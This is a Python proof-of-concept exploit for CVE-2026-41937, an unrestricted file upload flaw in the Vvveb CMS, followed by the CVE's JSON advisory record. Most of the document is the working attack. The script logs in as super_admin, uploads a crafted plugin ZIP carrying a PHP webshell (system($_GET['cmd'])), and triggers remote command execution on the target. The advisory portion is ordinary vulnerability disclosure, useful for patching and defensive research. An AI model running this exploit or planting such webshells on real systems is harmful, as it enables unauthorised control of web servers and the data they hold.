CVE-2026-41937

# Proof of Concept (PoC) for CVE-2026-41937 # This script demonstrates the exploitation of the unrestricted file upload in Vvveb. # Usage: python poc.py <target_url> <username> <password> import requests import zipfile import io import sys def create_malicious_zip(): # Create a malicious ZIP file in memory zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zip_file: # 1. plugin.php with valid Slug header plugin_content = """<?php /* Plugin Name: Evil Plugin Slug: evil-plugin Version: 1.0 */ // This file is required for the plugin structure ?>""" zip_file.writestr('plugin.php', plugin_content) # 2. public/index.php with arbitrary PHP code (webshell) shell_content = """<?php system($_GET['cmd']); ?>""" zip_file.writestr('public/index.php', shell_content) zip_buffer.seek(0) return zip_buffer def exploit(target_url, username, password): session = requests.Session() # Step 1: Login as super_admin (Authentication details depend on target config) login_url = f"{target_url}/index.php?module=admin/login" # Note: Adjust payload based on actual login form structure login_data = { 'email': username, 'password': password, 'login': 'login' } print(f"[*] Logging in to {login_url}...") try: r = session.post(login_url, data=login_data) if 'dashboard' not in r.text.lower() and 'admin' not in r.text.lower(): print("[-] Login failed or session token unknown.") return except Exception as e: print(f"[-] Error during login: {e}") return # Step 2: Upload the malicious plugin upload_url = f"{target_url}/index.php?module=admin/plugins&action=install" files = { 'file': ('evil_plugin.zip', create_malicious_zip(), 'application/zip') } print(f"[*] Uploading malicious plugin to {upload_url}...") try: r = session.post(upload_url, files=files) print(f"[*] Upload response status: {r.status_code}") except Exception as e: print(f"[-] Error during upload: {e}") return # Step 3: Trigger the RCE # The plugin slug is 'evil-plugin', so the path is usually /plugins/evil-plugin/public/index.php shell_url = f"{target_url}/plugins/evil-plugin/public/index.php" print(f"[*] Triggering payload at {shell_url}?cmd=whoami...") try: r = session.get(f"{shell_url}?cmd=whoami") if r.status_code == 200: print("[+] Exploit successful! Command output:") print(r.text) else: print(f"[-] Failed to execute code. Status: {r.status_code}") except Exception as e: print(f"[-] Error triggering payload: {e}") if __name__ == "__main__": if len(sys.argv) != 4: print("Usage: python poc.py <url> <user> <pass>") sys.exit(1) exploit(sys.argv[1], sys.argv[2], sys.argv[3])

{"cve": {"id": "CVE-2026-41937", "sourceIdentifier": "[email protected]", "published": "2026-05-14T15:16:46.190", "lastModified": "2026-05-14T16:24:56.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vvveb before 1.0.8.3 contains an unrestricted file upload vulnerability in the plugin upload endpoint that allows super_admin users to execute arbitrary PHP code by uploading a malicious plugin ZIP file. Attackers can craft a ZIP containing a plugin.php with a valid Slug header and a public/index.php file with arbitrary PHP code, which executes as the web server user when accessed via unauthenticated HTTP requests to the plugin's public path."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-61"}, {"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://github.com/givanz/Vvveb/commit/04f0294350ec429e307cd31c2e777a4797c868d6", "source": "[email protected]"}, {"url": "https://github.com/givanz/Vvveb/releases/tag/1.0.8.3", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/vvveb-unrestricted-file-upload-rce-via-plugin-upload", "source": "[email protected]"}]}}